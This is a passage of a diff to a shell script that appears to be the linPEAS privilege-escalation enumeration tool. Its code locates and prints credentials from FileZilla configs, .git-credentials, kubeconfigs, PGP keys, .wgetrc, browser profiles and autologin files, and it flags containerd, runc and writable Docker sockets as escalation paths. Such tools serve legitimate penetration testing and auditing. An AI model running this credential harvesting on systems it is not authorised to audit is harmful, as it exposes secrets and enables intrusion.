"$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then print_2title "Analyzing Filezilla Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then print_2title "Analyzing Backup Manager Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; fi @@ -3103,16 +3800,16 @@ fi if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then print_2title "Analyzing Github Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then print_2title "Analyzing Svn Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; fi @@ -3121,94 +3818,96 @@ if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Cache Vi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then print_2title "Analyzing Wget Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; fi ##-- SI) containerd installed -containerd=$(command -v ctr) -if [ "$containerd" ] || [ "$DEBUG" ]; then - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," - ctr image list +if ! [ "$SEARCH_IN_FOLDER" ]; then + containerd=$(command -v ctr) + if [ "$containerd" ] || [ "$DEBUG" ]; then + print_2title "Checking if containerd(ctr) is available" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation" + if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list 2>&1 + fi + echo "" fi - echo "" fi ##-- SI) runc installed -runc=$(command -v runc) -if [ "$runc" ] || [ "$DEBUG" ]; then - print_2title "Checking if runc is available" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - if [ "$runc" ]; then - echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +if ! [ "$SEARCH_IN_FOLDER" ]; then + runc=$(command -v runc) + if [ "$runc" ] || [ "$DEBUG" ]; then + print_2title "Checking if runc is available" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation" + if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + fi + echo "" fi - echo "" fi #-- SI) Docker if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation" printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do ls -l "$f" 2>/dev/null if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then - echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "Docker related socket ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi done echo "" fi -if [ -d "$HOME/.kube" ] || [ -d "/etc/kubernetes" ] || [ -d "/var/lib/localkube" ] || [ "`(env | set) | grep -Ei 'kubernetes|kube' | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE"`" ] || [ "$DEBUG" ]; then - print_2title "Kubernetes information" | sed -${E} "s,config,${SED_RED}," - ls -l "$HOME/.kube" 2>/dev/null - grep -ERH "client-secret:|id-token:|refresh-token:" "$HOME/.kube" 2>/dev/null | sed -${E} "s,client-secret:.*|id-token:.*|refresh-token:.*,${SED_RED}," - (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED}," - ls -Rl /etc/kubernetes /var/lib/localkube 2>/dev/null -fi - -if [ "$PSTORAGE_KUBELET" ] || [ "$DEBUG" ]; then - print_2title "Analyzing Kubelet Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KUBELET\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBELET" | grep -E "kubelet$" | while read f; do ls -ld "$f" | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_KUBELET\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBELET" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" | sed -${E} "s,kube-proxy$,${SED_RED},"; find "$f" -name "kubeconfig" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeconfig,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,cluster:|certificate-authority-data:|namespace:|user:|token:,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_KUBERNETES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Kubernetes Files (limit 70)" + (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBERNETES|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED}," + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubeconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet-kubeconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet-kubeconfig"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet-kubeconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet-kubeconfig$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"psk\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"\.kube.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".kube*"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "\.kube.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.kube.*$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubelet$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubelet"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubelet$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubelet$,${SED_RED},"; find "$f" -name "kubelet.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubelet.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "config.yaml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yaml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,server:|cluster:|namespace:|user:|exec:,${SED_RED},g"; done; echo "";find "$f" -name "kubeadm-flags.env" | while read ff; do ls -ld "$ff" | sed -${E} "s,kubeadm-flags.env,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kube-proxy$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kube-proxy"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kube-proxy$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kube-proxy$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KUBERNETES\" | grep -E \"kubernetes$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "kubernetes"; fi; fi; printf "%s" "$PSTORAGE_KUBERNETES" | grep -E "kubernetes$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,kubernetes$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Firefox Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then print_2title "Analyzing Chrome Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then print_2title "Analyzing Autologin Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} 